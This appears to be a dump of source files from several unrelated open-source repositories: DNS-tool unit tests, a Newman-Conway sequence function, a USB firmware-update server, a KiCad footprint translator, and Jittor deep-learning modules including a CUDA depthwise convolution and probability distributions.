'lets_do_dns.do_domain.resource.requests.delete',
return_value='stub-response')
mock_response = mocker.patch(
'lets_do_dns.do_domain.resource.Response')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
mock_response.assert_called_with('stub-response')
@pytest.mark.parametrize(
'requests_exception', [requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout])
def test_raises_authentication_failure_on_requests_exception(
mocker, requests_exception):
mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete',
side_effect=requests_exception)
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
with pytest.raises(RecordDeletionError):
resource.delete()
def test_passes_handled_exception_to_authentication_failure(
mocker):
stub_timeout = requests.exceptions.Timeout()
mocker.patch('lets_do_dns.do_domain.resource.requests.delete',
side_effect=stub_timeout)
mock_record_creation_failure = mocker.patch(
'lets_do_dns.do_domain.resource.RecordDeletionError',
return_value=RecordDeletionError)
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
with pytest.raises(RecordDeletionError):
resource.delete()
mock_record_creation_failure.assert_called_once_with(stub_timeout)
```
#### File: tests/unit/test_errors.py
```python
from subprocess import CalledProcessError
import pytest
from lets_do_dns.errors import (
BaseError, HookError, InputError, AuthenticationError, CleanupError,
RecordCreationError, RecordLookupError,
RecordDeletionError, PostCommandError)
@pytest.mark.parametrize(
'base_exception', [RecordCreationError, RecordDeletionError,
RecordLookupError, InputError])
def test_base_errors_have_docstring(base_exception):
assert base_exception.__doc__
@pytest.mark.parametrize(
'hook_exception', [AuthenticationError, CleanupError])
def test_hook_errors_have_hook_name(hook_exception):
assert hook_exception.hook_name
class TestInheritance(object):
@pytest.mark.parametrize(
'child_exception', [HookError, InputError])
def test_base_errors(self, child_exception):
assert issubclass(child_exception, BaseError)
@pytest.mark.parametrize(
'child_exception', [AuthenticationError, CleanupError])
def test_hook_errors(self, child_exception):
assert issubclass(child_exception, HookError)
@pytest.mark.parametrize(
'child_exception', [RecordCreationError, RecordLookupError])
def test_authentication_errors(self, child_exception):
assert issubclass(child_exception, AuthenticationError)
@pytest.mark.parametrize(
'child_exception', [RecordDeletionError, PostCommandError])
def test_cleanup_errors(self, child_exception):
assert issubclass(child_exception, CleanupError)
class TestBaseError(object):
def test_message_returns_first_line_of_docstring(self):
error = BaseError()
error.__doc__ = 'first-line\nsecond-line'
assert error.message == 'first-line'
def test_message_trims_period_from_end_of_docstring(self, mocker):
stub_exception = mocker.Mock(
spec=Exception, __str__=lambda _: 'stub-exception')
error = BaseError(stub_exception)
error.__doc__ = 'message ending with a period.'
assert error.message == 'message ending with a period'
def test___str___includes_message(self, mocker):
stub_exception = mocker.Mock(
spec=Exception, __str__=lambda _: 'stub-exception')
mock_message = mocker.patch(
'lets_do_dns.errors.BaseError.message',
new_callable=mocker.PropertyMock, return_value='stub-string')
str(BaseError(stub_exception))
mock_message.assert_called_once()
def test___str___includes_passed_exception(self, mocker):
stub_exception = mocker.Mock(
spec=Exception, __str__=lambda _: 'stub-exception')
error = BaseError(stub_exception)
error.__doc__ = 'stub-docstring'
message = str(error)
assert 'stub-exception' in message
class TestHookError(object):
def test_message_includes_parent_message_(self, mocker):
stub_message = mocker.PropertyMock(return_value='stub-message')
mocker.patch(
'lets_do_dns.errors.BaseError.message',
new=stub_message)
error = HookError('stub-exception')
assert 'stub-message' in error.message
@pytest.mark.parametrize(
'hook_under_test', ['authentication', 'cleanup'])
def test_message_includes_stage_information(self, hook_under_test):
error = HookError('stub-exception')
error.hook_name = hook_under_test
assert hook_under_test in error.message
class TestPostCommandError(object):
def test___str___includes_parent_message(self, mocker):
stub_message = mocker.PropertyMock(
return_value='stub-message')
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-error-message', output=None)
mocker.patch(
'lets_do_dns.errors.HookError.message', new=stub_message)
error = PostCommandError(stub_subprocess_exception)
assert 'stub-message' in error.__str__()
def test___str___includes_command_output_when_present(self, mocker):
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-message', output='stub-output')
error = PostCommandError(stub_subprocess_exception)
assert 'stub-output' in error.__str__()
def test___str___does_not_include_command_output_when_absent(
self, mocker):
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-message', output=None)
error = PostCommandError(stub_subprocess_exception)
assert 'None' not in error.__str__()
def test___str___prepends_output_text_lines_with_four_spaces(
self, mocker):
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-message', output='line 1\nline 2')
error = PostCommandError(stub_subprocess_exception)
assert '\n line 1\n line 2' in error.__str__()
``` |
{
"source": "jittania/dynamic-programming",
"score": 4
} |
#### File: dynamic-programming/lib/newman_conway.py
```python
def newman_conway(num):
""" Returns a list of the Newman Conway numbers for the given value.
Time Complexity: O(n)
Space Complexity: O(n)
"""
    # Base case: num must be a positive integer; P(1) is simply "1"
    if num < 1:
        raise ValueError("num must be a positive integer")
if num == 1:
return '1'
    # Seed values: P(1) = 1 and P(2) = 1 (index 0 is an unused placeholder)
    nc_seq_nums = [0, 1, 1]
    # The sequence is returned as a space-separated string:
    nc_seq_str = "1 1 "
for i in range(3, num + 1):
# calculating next Newman-Conway sequence value and appending
nc_seq_nums.append(nc_seq_nums[nc_seq_nums[i - 1]] + nc_seq_nums[i - nc_seq_nums[i - 1]])
# must convert to string
nc_seq_str += f"{nc_seq_nums[i]} "
return nc_seq_str[:-1]
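# Worked example (derived from the recurrence P(n) = P(P(n-1)) + P(n - P(n-1))):
#   newman_conway(6) -> "1 1 2 2 3 4"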
``` |
{
"source": "JitterCompany/jitter_usb_py",
"score": 3
} |
#### File: jitter_usb_py/examples/console.py
```python
from PyQt5 import QtWidgets
class ConsoleView(QtWidgets.QWidget):
def __init__(self):
"""
Consoleview combines the terminal and debuglog window
"""
super().__init__()
self.layout = QtWidgets.QHBoxLayout()
self.setLayout(self.layout)
def addView(self, view, label):
layout = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel(label)
layout.addWidget(label)
layout.addWidget(view)
self.layout.addLayout(layout)
```
#### File: jitter_usb_py/jitter_usb_py/update_server.py
```python
import threading
import socket
import socketserver
import time
import queue
def list_to_str(l):
    # Join items with commas; an empty list yields an empty string.
    return ",".join(str(i) for i in l)
def encode(string):
return bytes(string, 'ascii')
def decode(bytestr):
return str(bytestr, 'ascii')
class FirmwareTask:
def __init__(self, device, fw_files):
""" Init FirmwareTask: fw_files is a {'dst_name': 'src_fname'} dict"""
self._device = device
self._fw_files = fw_files
self._result = None
def execute(self):
""" Perform a firmware update from main/USB thread"""
if not self._device:
print("WARNING: dummy mode!")
self._result = False
return
print("updating device {}: prepare for update".format(
self._device.serial_number))
self._device.stop()
for dst_fname, src_fname in self._fw_files.items():
self._device.upload_file(dst_fname, src_fname,
on_complete=self._on_upload_cb)
self._device.reboot(on_complete=self._on_reboot_cb)
def _on_upload_cb(self, fname):
print("updating device {}: file {} uploaded".format(
self._device.serial_number, fname))
def _on_reboot_cb(self):
print("updating device {}: reboot done!".format(
self._device.serial_number))
self._result =True
def wait(self, timeout_sec=5):
""" Wait untill the task is done, returns False on timeout"""
interval = 0.1
while (timeout_sec > 0) and (self._result is None):
time.sleep(interval)
timeout_sec-= interval
return self._result
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("\n==== Firmware Update Request ====")
devices = [d.serial_number for d in self.server.get_device_list()]
header = "devices=" + list_to_str(devices)
self.request.sendall(encode(header))
data = decode(self.request.recv(1024*1024)).split("\n")
response = self._process_client_command(data)
self.request.sendall(encode(response))
print("=" * 33)
def _process_client_command(self, data):
FILE_PREFIX = 'file:'
# received params
to_update = []
fw_files = {}
# parse commands from client
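        # Example client payload (illustrative file paths and serial numbers):
        #   fw_m4=build/fw_m4.bin               -> uploaded as fw_m4.bin
        #   file:config.json=build/config.json  -> uploaded as config.json
        #   update_devices=SERIAL-001,SERIAL-002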
for line in data:
tokens = line.split('=')
if len(tokens) < 2:
continue
key = tokens[0]
value = line[len(key):].strip('=')
# fw_*[.bin]=<src_filename> uploads <src_filename> as fw_*.bin
if key.startswith('fw_'):
dst_name = key
if not dst_name.endswith('.bin'):
dst_name+= '.bin'
fw_files[dst_name] = value
# file:<src_fname>=<src_fname> uploads <src_fname> as <dst_fname>
elif key.startswith(FILE_PREFIX):
dst_name = key[len(FILE_PREFIX):]
fw_files[dst_name] = value
# update_devices=<csv_devicelist> updates all devices in the list
elif key == 'update_devices':
to_update = [v.strip() for v in value.split(',')]
else:
print("API WARNING: unknown key '{}'".format(key))
updated = []
for dev_id in to_update:
if self._do_firmware_upgrade(dev_id, fw_files):
updated.append(dev_id)
else:
print("updating device {}: fail or timeout".format(dev_id))
response = "updated=" + list_to_str(updated)
return response
def _find_device(self, dev_id):
devices = self.server.get_device_list()
for dev in devices:
if dev.serial_number == dev_id:
return dev
return None
def _do_firmware_upgrade(self, dev_id, fw_files):
dst_names = [dst for dst in fw_files]
print("Update {} {}".format(dev_id, dst_names))
device = self._find_device(dev_id)
if device is None:
return False
task = FirmwareTask(device, fw_files)
self.server.update_tasks.put(task)
return task.wait(timeout_sec=10)
class FirmwareUpdateServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, addr, device_list=[]):
super().__init__(addr, ThreadedTCPRequestHandler)
self._device_list = device_list
self.update_tasks = queue.Queue()
def update_device_list(self, new_device_list):
""" Keep the list of available devices up to date """
print("FirmwareUpdateServer: new device list:",
[dev.serial_number for dev in new_device_list])
self._device_list = new_device_list
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def start(self):
ip, port = self.server_address
server_thread = threading.Thread(target=self.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Firmware Update Server ready at {}:{}".format(ip,port))
def stop(self):
self.shutdown()
self.server_close()
print("Firmware Update Server stopped")
def poll(self):
try:
t = self.update_tasks.get(block=False)
if t:
t.execute()
except queue.Empty:
pass
def get_device_list(self):
return self._device_list
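# Usage sketch (the bind address and the poll loop below are assumptions, not part
# of this sample):
#   server = FirmwareUpdateServer(("0.0.0.0", 8000), device_list=devices)
#   server.start()
#   while running:        # main/USB thread
#       server.poll()     # executes queued FirmwareTasks on this thread
#   server.stop()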
``` |
{
"source": "JitterCompany/Kicad_bom_sync",
"score": 3
} |
#### File: JitterCompany/Kicad_bom_sync/translate_fp.py
```python
import re
def _substr_after(s, delim):
return s.partition(delim)[2]
passive_package_regex = re.compile(r'(^.*\s+[0-9]+)\s+[0-9]+(M|m)etric$')
def translate_fp(fp_string):
"""
Translate a footprint to a simpler human-readable format
The goal is to make the BOM as clean and readable as possible. Note
that the translated footprints are l
still keeping the footprints unique enough that they can be used to
correctly group parts based on them
"""
if not fp_string:
return ""
if not isinstance(fp_string, str):
fp_string = str(fp_string)
result = fp_string
# Try to remove the library prefix
lib_prefix_removed = _substr_after(fp_string, ':')
if lib_prefix_removed:
result=lib_prefix_removed
# Underscore to space for better readability
result = result.replace('_', ' ').strip()
match = passive_package_regex.match(result)
if match:
result = match.group(1)
return result
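# Example (illustrative KiCad footprint name):
#   translate_fp("Capacitor_SMD:C_0603_1608Metric") -> "C 0603"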
``` |
{
"source": "Jittor/Jittor",
"score": 2
} |
#### File: jittor/dataset/utils.py
```python
import jittor as jt
import numpy as np
from collections.abc import Sequence, Mapping
from PIL import Image
import time
def get_random_list(n):
return list(np.random.permutation(range(n)))
def get_order_list(n):
return [i for i in range(n)]
def collate_batch(batch):
r"""Puts each data field into a tensor with outer dimension batch size"""
real_size = len(batch)
elem = batch[0]
elem_type = type(elem)
if isinstance(elem, jt.Var):
temp_data = jt.stack([data for data in batch], 0)
return temp_data
if elem_type is np.ndarray:
temp_data = np.stack([data for data in batch], 0)
return temp_data
elif np.issubdtype(elem_type, np.integer):
return np.int32(batch)
elif isinstance(elem, int):
return np.int32(batch)
elif isinstance(elem, float):
return np.float32(batch)
elif isinstance(elem, str):
return batch
elif isinstance(elem, Mapping):
return {key: collate_batch([d[key] for d in batch]) for key in elem}
elif isinstance(elem, tuple):
transposed = zip(*batch)
return tuple(collate_batch(samples) for samples in transposed)
elif isinstance(elem, Sequence):
transposed = zip(*batch)
return [collate_batch(samples) for samples in transposed]
elif isinstance(elem, Image.Image):
temp_data = np.stack([np.array(data) for data in batch], 0)
return temp_data
else:
raise TypeError(f"Not support type <{elem_type.__name__}>")
class HookTimer:
def __init__(self, obj, attr):
self.origin = getattr(obj, attr)
self.duration = 0.0
setattr(obj, attr, self)
def __call__(self, *args, **kw):
start = time.time()
rt = self.origin(*args, **kw)
self.duration += time.time() - start
return rt
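# Usage sketch (the hooked attribute name is an assumption):
#   timer = HookTimer(dataset, "collate_batch")
#   ... iterate over the dataset ...
#   print(timer.duration)   # cumulative seconds spent inside the hooked callable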
```
#### File: python/jittor/depthwise_conv.py
```python
import jittor as jt
from jittor import init
from jittor import nn
from jittor import Function
class DepthwiseConv(Function):
def __init__(self, stride=1, padding=0, dilation=1):
self.stride = stride if isinstance(stride, tuple) else (stride, stride)
self.padding = padding if isinstance(padding, tuple) else (padding, padding)
self.dilation = dilation if isinstance(dilation, tuple) else (dilation, dilation)
def execute(self, x, weight):
self.save_vars = x, weight
N,C,H,W = x.shape
o,i,Kh,Kw = weight.shape
assert(o == C)
oh = (H+self.padding[0]*2-Kh*self.dilation[0]+self.dilation[0]-1)//self.stride[0]+1
ow = (W+self.padding[1]*2-Kw*self.dilation[1]+self.dilation[1]-1)//self.stride[1]+1
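        # Output size follows the standard convolution formula:
        #   out = (in + 2*pad - dilation*(kernel-1) - 1) // stride + 1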
filter_height, filter_width = Kh, Kw
self.Khw = Kh, Kw
assert oh>0 and ow>0
output = jt.code(
[N, C, oh, ow],
x.dtype,
[x, weight],
cuda_header = """
template <typename T,
int filter_height,
int filter_width,
int stride_height,
int stride_width>
__global__ void KernelDepthwiseConv(
const T *const input_data, const T *const filter_data, const int batch_size,
const int output_channels, const int output_height,
const int output_width, const int input_channels,
const int input_height, const int input_width,
const int padding_height, const int padding_width,
const int dilate_height, const int dilate_width, T *const output_data) {
const int kWeghtSize = filter_height * filter_width;
T r_weight[kWeghtSize];
const int batch = blockIdx.y;
const int c_out = blockIdx.x;
const T* weight = filter_data + c_out * filter_height * filter_width;
for (int i = 0; i < filter_height * filter_width; i++) r_weight[i] = weight[i];
for (int w_out = threadIdx.x; w_out < output_width; w_out += blockDim.x) {
for (int h_out = threadIdx.y; h_out < output_height; h_out += blockDim.y) {
const int batch = blockIdx.y;
const int c_out = blockIdx.x;
const int c_in = c_out;
T value = 0;
const int h_in_start = -padding_height + h_out * stride_height;
const int w_in_start = -padding_width + w_out * stride_width;
const int h_in_end = h_in_start + filter_height * dilate_height;
const int w_in_end = w_in_start + filter_width * dilate_width;
const int in_offset =
((batch * input_channels + c_in) * input_height) * input_width;
const int h_end = h_in_end < input_height ? h_in_end : input_height;
const int w_end = w_in_end < input_width ? w_in_end : input_width;
const int h_start = h_in_start > 0 ? h_in_start : 0;
const int w_start = w_in_start > 0 ? w_in_start : 0;
for (int h_in = h_in_start, h_f = 0; h_f < filter_height;
h_in += dilate_height, h_f++) {
for (int w_in = w_in_start, w_f = 0; w_f < filter_width;
w_in += dilate_width, w_f++) {
if (h_in >= 0 && h_in < input_height && w_in >= 0 &&
w_in < input_width) {
const int offset = in_offset + h_in * input_width + w_in;
value += r_weight[h_f * filter_width + w_f] * input_data[offset];
}
}
}
int index =
((batch * gridDim.x + c_out) * output_height + h_out) * output_width +
w_out;
output_data[index] = value;
}
}
}
""",
cuda_src=f"""
@alias(input, in0)
@alias(filter, in1)
@alias(output, out)
const int batch_size = input_shape0;
const int input_channels = input_shape1;
const int input_height = input_shape2;
const int input_width = input_shape3;
const int output_channels = output_shape1;
const int output_height = output_shape2;
const int output_width = output_shape3;
const int ksize_height = {Kh};
const int ksize_width = {Kw};
const int stride_height = {self.stride[0]};
const int stride_width = {self.stride[1]};
const int padding_height = {self.padding[0]};
const int padding_width = {self.padding[1]};
const int dilate_height = {self.dilation[0]};
const int dilate_width = {self.dilation[1]};
int thread = 512;
if (output_width > 1024 && output_width <= 2048)
thread = (output_width - 1) / 2 + 1;
else if (output_width > 512 && output_width <= 1024)
thread = output_width;
int blocks = std::min(std::max(thread / output_width, 1), output_height);
dim3 threads(std::min(output_width, thread), blocks, 1);
dim3 grid(output_channels, batch_size, 1);
KernelDepthwiseConv<
input_type, ksize_height, ksize_width,
stride_height, stride_width>
<<<grid, threads>>>(
input_p, filter_p, batch_size, output_channels, output_height,
output_width, input_channels, input_height, input_width,
padding_height, padding_width, dilate_height,
dilate_width, output_p);
"""
)
return output
def grad(self, grad):
x, weight = self.save_vars
Kh, Kw = self.Khw
return jt.code([x.shape, weight.shape], [x.dtype, weight.dtype], [x, weight, grad],
cuda_header = f"#include <{jt.compile_extern.cub_home}cub/cub.cuh>"+"""
template <typename T>
__device__ __inline__ void CudaAtomicAddWithWarp(T* sum, T value) {
typedef cub::WarpReduce<T> WarpReduce;
typename WarpReduce::TempStorage temp_storage;
value = WarpReduce(temp_storage).Sum(value);
if (cub::LaneId() == 0)
atomicAdd(sum, value);
}
// CUDA kernel to compute the depthwise convolution backprop w.r.t input.
template <typename T,
int filter_height,
int filter_width,
int stride_height,
int stride_width>
__global__ void KernelDepthwiseConvInputGradCFilter(
const T *const input_data, const T *const output_grad_data,
const T *const filter_data, const int batch_size,
const int output_channels, const int output_height,
const int output_width, const int input_channels,
const int input_height, const int input_width,
const int padding_height, const int padding_width,
const int dilate_height, const int dilate_width,
T *const input_grad_data) {
  const int kWeightSize = filter_height * filter_width + 1;
  T r_weight[kWeightSize];
const int batch = blockIdx.y;
const int c_in = blockIdx.x;
const T* weight = filter_data + c_in * filter_height * filter_width;
for (int i = 0; i < filter_height * filter_width; i++)
r_weight[i] =
weight[filter_height * filter_width - i - 1];
for (int w_in = threadIdx.x; w_in < input_width; w_in += blockDim.x) {
for (int h_in = threadIdx.y; h_in < input_height; h_in += blockDim.y) {
const int batch = blockIdx.y;
const int c_in = blockIdx.x;
int h_out_start = h_in - (filter_height - 1) * dilate_height + padding_height;
int w_out_start = w_in - (filter_width - 1) * dilate_width + padding_width;
T value = 0;
int index =
((batch * gridDim.x + c_in) * input_height + h_in) * input_width +
w_in;
for (int h_out = h_out_start, h_f = 0; h_f < filter_height;
h_out += dilate_height, h_f++) {
for (int w_out = w_out_start, w_f = 0; w_f < filter_width;
w_out += dilate_width, w_f++) {
int s_h_out = h_out / stride_height;
int s_w_out = w_out / stride_width;
if (h_out % stride_height == 0 && w_out % stride_width == 0 &&
s_h_out >= 0 && s_h_out < output_height && s_w_out >= 0 &&
s_w_out < output_width) {
const int output_grad_offset =
((batch * output_channels + c_in) * output_height +
s_h_out) *
output_width +
s_w_out;
value +=
output_grad_data[output_grad_offset] *
r_weight[h_f * filter_width + w_f];
}
}
}
input_grad_data[index] = value;
}
}
}
// Cuda kernel to compute the depthwise convolution backprop w.r.t. filter.
template <typename T>
__global__ void KernelDepthwiseConvFilterGrad(
const T* output_grad_data, const T* input_data, const int num,
const int output_channels, const int output_height, const int output_width,
const int input_channels, const int input_height, const int input_width,
const int filter_height,
const int filter_width, const int stride_height, const int stride_width,
const int padding_height, const int padding_width, const int dilate_height,
const int dilate_width, T* filter_grad_data) {
T s = 0;
int gbid = (((blockIdx.z * blockDim.z + threadIdx.z) * gridDim.y) + blockIdx.y) * gridDim.x + blockIdx.x;
for (int image_w = threadIdx.x; image_w < output_width;
image_w += blockDim.x) {
for (int bid = 0; bid < num; bid++) {
//for (int bid = threadIdx.z; bid < num; bid+=blockDim.z) {
for (int image_h = threadIdx.y; image_h < output_height;
image_h += blockDim.y) {
int kernel_id = blockIdx.z;
int kernel_h = blockIdx.y * dilate_height - padding_height;
int kernel_w = blockIdx.x * dilate_width - padding_width;
int image_hk = image_h * stride_height + kernel_h;
int image_wk = image_w * stride_width + kernel_w;
if (image_hk < 0 || image_hk >= input_height) continue;
if (image_wk < 0 || image_wk >= input_width) continue;
#define gaid(N, C, H, W) \
((((N)*gridDim.z + (C)) * output_height + (H)) * output_width + (W))
int input_id = ((bid * gridDim.z +
kernel_id) *
input_height +
image_hk) *
input_width +
image_wk;
s += output_grad_data[gaid(bid, kernel_id, image_h, image_w)] *
input_data[input_id];
#undef gaid
}
}
}
CudaAtomicAddWithWarp(&filter_grad_data[gbid], s);
}
""",
cuda_src=f"""
// source for backward to data
@alias(input, in0)
@alias(filter, in1)
@alias(output_grad, in2)
@alias(input_grad, out0)
@alias(filter_grad, out1)
const int batch_size = input_shape0;
const int input_channels = input_shape1;
const int input_height = input_shape2;
const int input_width = input_shape3;
const int output_channels = output_grad_shape1;
const int output_height = output_grad_shape2;
const int output_width = output_grad_shape3;
const int ksize_height = {Kh};
const int ksize_width = {Kw};
const int stride_height = {self.stride[0]};
const int stride_width = {self.stride[1]};
const int padding_height = {self.padding[0]};
const int padding_width = {self.padding[1]};
const int dilate_height = {self.dilation[0]};
const int dilate_width = {self.dilation[1]};
int thread = 512;
if (input_width > 1024 && input_width <= 2048)
thread = (input_width - 1) / 2 + 1;
else if (input_width > 512 && input_width <= 1024)
thread = input_width;
int blocks = std::min(std::max(thread / input_width, 1), input_height);
dim3 threads(std::min(input_width, thread), blocks, 1);
dim3 grid(input_channels, batch_size, 1);
KernelDepthwiseConvInputGradCFilter<
input_type, ksize_height, ksize_width
, stride_height, stride_width>
<<<grid, threads, 0>>>(
input_p, output_grad_p, filter_p, batch_size,
output_channels, output_height, output_width, input_channels,
input_height, input_width, padding_height,
padding_width, dilate_height, dilate_width, input_grad_p);
// source for backward to filter
int block_size = 512;
if (output_width > 1024 && output_width <= 2048)
block_size = (output_width - 1) / 2 + 1;
else if (output_width > 512 && output_width <= 1024)
block_size = output_width;
int crop_output_height =
std::min(std::max(block_size / output_width, 1), output_height);
grid = dim3(ksize_width, ksize_height, output_channels);
threads = dim3(std::min(output_width, block_size), crop_output_height, 1);
cudaMemsetAsync(filter_grad_p, 0, filter_grad->size);
KernelDepthwiseConvFilterGrad<
input_type><<<grid, threads, 0>>>(
output_grad_p, input_p, batch_size, output_channels,
output_height, output_width, input_channels, input_height,
input_width, ksize_height, ksize_width,
stride_height, stride_width, padding_height, padding_width,
dilate_height, dilate_width, filter_grad_p);
"""
)
```
#### File: python/jittor/distributions.py
```python
import math
import numpy as np
import jittor as jt
from jittor.nn import binary_cross_entropy_with_logits
def simple_presum(x):
src = '''
__inline_static__
@python.jittor.auto_parallel(1)
void kernel(int n0, int i0, in0_type* x, in0_type* out, int nl) {
out[i0*(nl+1)] = 0;
for (int i=0; i<nl; i++)
out[i0*(nl+1)+i+1] = out[i0*(nl+1)+i] + x[i0*nl+i];
}
kernel(in0->num/in0->shape[in0->shape.size()-1], 0, in0_p, out0_p, in0->shape[in0->shape.size()-1]);
'''
return jt.code(x.shape[:-1]+(x.shape[-1]+1,), x.dtype, [x],
cpu_src=src, cuda_src=src)
class OneHotCategorical:
def __init__(self, probs=None, logits=None):
Categorical.__init__(self, probs, logits)
def sample(self, sample_shape=[]):
shape = sample_shape + self.probs.shape[:-1] + (1,)
rand = jt.rand(shape)
one_hot = jt.logical_and(self.cum_probs_l < rand, rand <= self.cum_probs_r).float()
return one_hot
def log_prob(self, x):
x = jt.argmax(x, dim=-1)[0]
return Categorical.log_prob(self, x)
def entropy(self):
p_log_p = self.logits * self.probs
return -p_log_p.sum(-1)
class Categorical:
def __init__(self, probs=None, logits=None):
assert not (probs is None and logits is None)
if probs is None:
# cannot align to pytorch
probs = jt.sigmoid(logits)
probs = probs / probs.sum(-1, True)
if logits is None:
logits = jt.safe_log(probs)
with jt.no_grad():
self.probs = probs
self.logits = logits
self.cum_probs = simple_presum(self.probs)
self.cum_probs_l = self.cum_probs[..., :-1]
self.cum_probs_r = self.cum_probs[..., 1:]
def sample(self, sample_shape=()):
shape = sample_shape + self.probs.shape[:-1] + (1,)
rand = jt.rand(shape)
one_hot = jt.logical_and(self.cum_probs_l < rand, rand <= self.cum_probs_r)
index = one_hot.index(one_hot.ndim - 1)
return (one_hot * index).sum(-1)
def log_prob(self, x):
a = self.probs.ndim
b = x.ndim
indexes = tuple( f'i{i}' for i in range(b-a+1, b) )
indexes = indexes + (x,)
return jt.safe_log(self.probs).getitem(indexes)
def entropy(self):
p_log_p = self.logits * self.probs
return -p_log_p.sum(-1)
class Normal:
def __init__(self, mu, sigma):
self.mu = mu
self.sigma = sigma
def sample(self, sample_shape=None):
return jt.normal(jt.array(self.mu), jt.array(self.sigma),size=sample_shape)
def log_prob(self, x):
var = self.sigma**2
log_scale = jt.safe_log(self.sigma)
return -((x-self.mu)**2) / (2*var) - log_scale-np.log(np.sqrt(2*np.pi))
def entropy(self):
return 0.5+0.5*np.log(2*np.pi)+jt.safe_log(self.sigma)
class Uniform:
def __init__(self,low,high):
self.low = low
self.high = high
assert high > low
def sample(self,sample_shape):
return jt.uniform(self.low,self.high,sample_shape)
def log_prob(self,x):
        if x < self.low or x >= self.high:
            return -math.inf  # outside the support the density is 0, so the log-prob is -inf
return -jt.safe_log(self.high - self.low)
def entropy(self):
return jt.safe_log(self.high - self.low)
class Geometric:
def __init__(self,p=None,logits=None):
assert (p is not None) or (logits is not None)
        if p is None:
            self.prob = jt.sigmoid(logits)
            self.logits = logits
        elif logits is None:
            assert 0 < p and p < 1  # range check only applies when p is given
            self.prob = p
            self.logits = -jt.safe_log(1. / p - 1)
def sample(self, sample_shape):
u = jt.rand(sample_shape)
        return (jt.safe_log(u) / (jt.safe_log(-self.prob+1))).floor_int()
def log_prob(self, x):
return x*jt.safe_log(-self.prob+1)+jt.safe_log(self.prob)
def entropy(self):
return binary_cross_entropy_with_logits(jt.array(self.logits),jt.array(self.prob)) / self.prob
def kl_divergence(cur_dist, old_dist):
assert isinstance(cur_dist, type(old_dist))
if isinstance(cur_dist, Normal):
vr = (cur_dist.sigma / old_dist.sigma)**2
t1 = ((cur_dist.mu - old_dist.mu) / old_dist.sigma)**2
return 0.5*(vr+t1-1-jt.safe_log(vr))
if isinstance(cur_dist, Categorical) or isinstance(cur_dist,OneHotCategorical):
t = cur_dist.probs * (cur_dist.logits-old_dist.logits)
return t.sum(-1)
if isinstance(cur_dist, Uniform):
res = jt.safe_log((old_dist.high - old_dist.low) / (cur_dist.high - cur_dist.low))
if old_dist.low > cur_dist.low or old_dist.high < cur_dist.high:
res = math.inf
return res
if isinstance(cur_dist, Geometric):
return -cur_dist.entropy() - jt.safe_log(-old_dist.prob+1) / cur_dist.prob - old_dist.logits
```
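A minimal usage sketch for the classes above (assuming the module is importable as `jittor.distributions`; the values are illustrative, and `log_prob`'s string-based `getitem` indexing is taken on trust from the library code):
```python
import jittor as jt
from jittor.distributions import Normal, Categorical, kl_divergence

# Two Gaussians with Var parameters; entropy and KL use only jt ops.
p = Normal(jt.array([0.0]), jt.array([1.0]))
q = Normal(jt.array([0.5]), jt.array([2.0]))
print(p.entropy().numpy())                # 0.5 + 0.5*log(2*pi) + log(sigma)
print(kl_divergence(p, q).numpy())        # closed-form KL(p || q) for Normals

# Categorical over three classes (the probabilities already sum to 1).
c = Categorical(probs=jt.array([[0.1, 0.2, 0.7]]))
print(c.entropy().numpy())                # -(probs * log(probs)).sum(-1)
print(c.log_prob(jt.array([2])).numpy())  # log-probability of class 2
```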
#### File: extern/acl/acl_compiler.py
```python
import os
from jittor_utils import env_or_try_find
import jittor_utils
import ctypes
import glob
has_acl = 0
cc_flags = ""
tikcc_path = env_or_try_find('tikcc_path', 'tikcc')
dlopen_flags = os.RTLD_NOW | os.RTLD_GLOBAL
def install():
import jittor.compiler as compiler
global has_acl, cc_flags
acl_compiler_home = os.path.dirname(__file__)
cc_files = sorted(glob.glob(acl_compiler_home+"/**/*.cc", recursive=True))
cc_flags += f" -DHAS_CUDA -DIS_ACL -I/usr/local/Ascend/latest/x86_64-linux/include/ -I/usr/local/Ascend/latest/x86_64-linux/include/acl -L/usr/local/Ascend/latest/x86_64-linux/lib64 -I/usr/local/Ascend/runtime/include -I/usr/local/Ascend/driver/include -L/usr/local/Ascend/compiler/lib64 -L/usr/local/Ascend/runtime/lib64 -I{acl_compiler_home} -ltikc_runtime -lascendcl "
ctypes.CDLL("libascendcl.so", dlopen_flags)
jittor_utils.LOG.i("ACL detected")
mod = jittor_utils.compile_module('''
#include "common.h"
namespace jittor {
// @pyjt(process)
string process_acl(const string& src, const string& name, const map<string,string>& kargs);
}''', compiler.cc_flags + " " + " ".join(cc_files) + cc_flags)
jittor_utils.process_jittor_source("acl", mod.process)
has_acl = 1
def check():
import jittor.compiler as compiler
global has_acl, cc_flags
if tikcc_path:
try:
install()
except Exception as e:
jittor_utils.LOG.w(f"load ACL failed, exception: {e}")
has_acl = 0
compiler.has_acl = has_acl
compiler.tikcc_path = tikcc_path
if not has_acl: return False
compiler.cc_flags += cc_flags
compiler.nvcc_path = tikcc_path
compiler.nvcc_flags = compiler.cc_flags.replace("-std=c++14","")
return True
```
#### File: jittor/models/inception.py
```python
import jittor as jt
from jittor import nn
__all__ = ['Inception3', 'inception_v3']
def inception_v3(pretrained=False, progress=True, **kwargs):
model = Inception3(**kwargs)
if pretrained: model.load("jittorhub://inception_v3.pkl")
return model
class Inception3(nn.Module):
""" Inceptionv3 model architecture.
Args:
* num_classes: Number of classes. Default: 1000.
* aux_logits: If True, add an auxiliary branch that can improve training. Default: True
